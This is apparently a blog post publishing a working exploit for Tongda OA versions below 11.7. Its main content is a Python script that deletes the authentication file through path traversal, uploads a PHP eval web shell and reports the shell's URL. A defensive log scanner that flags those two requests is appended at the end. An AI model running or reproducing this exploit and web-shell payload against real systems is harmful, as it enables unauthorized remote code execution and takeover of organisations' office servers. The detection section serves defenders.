Tongda OA 0day exp

Published on 2020-08-19


0x01 Introduction

Exploitable versions: < 11.7. This vulnerability is dangerous; setting up your own environment for testing is recommended.

0x02 Exp

import sys
import requests

if len(sys.argv) == 2:
    target= sys.argv[1]
    payload="<?php @eval($_POST['ant']);?>"
    url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
    requests.get(url=url)
    url=target+"/inc/auth.inc.php"
    page=requests.get(url=url).text
    if 'No input file specified.' not in page:
        print("[-]Failed to delete auth.inc.php")
        exit(-1)
    print("[+]Successfully deleted auth.inc.php!")
    url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
    files = {'FILE1': ('ant.php', payload)}
    requests.post(url=url,files=files)
    url=target+"/_ant.php"
    page=requests.get(url=url).text
    if 'No input file specified.' not in page:
        print("[+]File Uploaded Successfully")
        print("[+]URL:",url)
    else:
        print("[-]Failed to upload file")
else:
    print("Tips:python3 tongda.py http://url")
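
A defender-side check for the two requests the script above sends, as an added example that is not part of the original post: it scans web access-log lines for a `guid` value containing `..` on `print.php` and a `repkid` value containing `..` or angle brackets on `upload.php`. The log format (combined log format), the sample lines, the rule names and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [19/Aug/2020:10:01:02 +0800] "GET /module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php HTTP/1.1" 200 0
198.51.100.7 - - [19/Aug/2020:10:01:03 +0800] "GET /inc/auth.inc.php HTTP/1.1" 404 25
198.51.100.7 - - [19/Aug/2020:10:01:04 +0800] "POST /general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.%3C%3E./.%3C%3E./.%3C%3E./ HTTP/1.1" 200 12
203.0.113.20 - - [19/Aug/2020:10:05:00 +0800] "GET /general/index.php HTTP/1.1" 200 5120
203.0.113.20 - - [19/Aug/2020:10:06:00 +0800] "GET /module/appbuilder/assets/print.php?guid=5f3c2a HTTP/1.1" 200 812
"""

# client IP, then the request target inside the quoted request line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\w+ (\S+) [^"]*"')

def classify(target):
    """Return a rule name if the request target matches one of the two requests, else None."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)  # parse_qs percent-decodes the values
    path = parts.path.lower()
    if path.endswith("/module/appbuilder/assets/print.php"):
        if any(".." in v for v in query.get("guid", [])):
            return "print.php-guid-traversal"
    if path.endswith("/general/data_center/utils/upload.php"):
        # Matches the repkid shape shown on the page: '..' or angle brackets in the value.
        if any(re.search(r"\.\.|[<>]", v) for v in query.get("repkid", [])):
            return "upload.php-repkid-traversal"
    return None

def scan(log_text):
    """Map client IP -> list of rule names hit, in log order."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        rule = classify(m.group(2)) if m else None
        if rule:
            hits.setdefault(m.group(1), []).append(rule)
    return hits

def full_chain(hits):
    """Clients that sent both requests, i.e. the whole sequence the script performs."""
    both = {"print.php-guid-traversal", "upload.php-repkid-traversal"}
    return sorted(ip for ip, rules in hits.items() if both <= set(rules))

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    print(found, full_chain(found))
```

For any client reported by `full_chain`, verify that `inc/auth.inc.php` is still present under the webroot and review the webroot for unexpected `.php` files.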
